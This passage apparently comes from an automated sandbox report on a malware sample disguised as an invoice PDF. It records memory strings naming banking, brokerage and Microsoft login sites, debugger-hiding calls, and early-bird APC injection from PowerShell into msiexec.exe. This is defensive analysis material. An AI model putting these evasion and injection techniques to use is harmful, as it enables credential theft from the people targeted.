Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593985	Jump to behavior

Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3286405273.0000000000767000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3286405273.000000000070A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: powershell.exe, 00000002.00000002.2413511774.0000000004EF7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\jq
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: powershell.exe, 00000002.00000002.2413511774.0000000004EF7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\jq
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: powershell.exe, 00000002.00000002.2413511774.0000000004EF7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\jq
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\INV-0542.pdf.exe	API call chain: ExitProcess graph end node			graph_0-3912
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	API call chain: ExitProcess graph end node			graph_0-3915

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\SysWOW64\msiexec.exe

Thread information set: HideFromDebugger

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_072B6B38 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,

2_2_072B6B38

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3B40000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
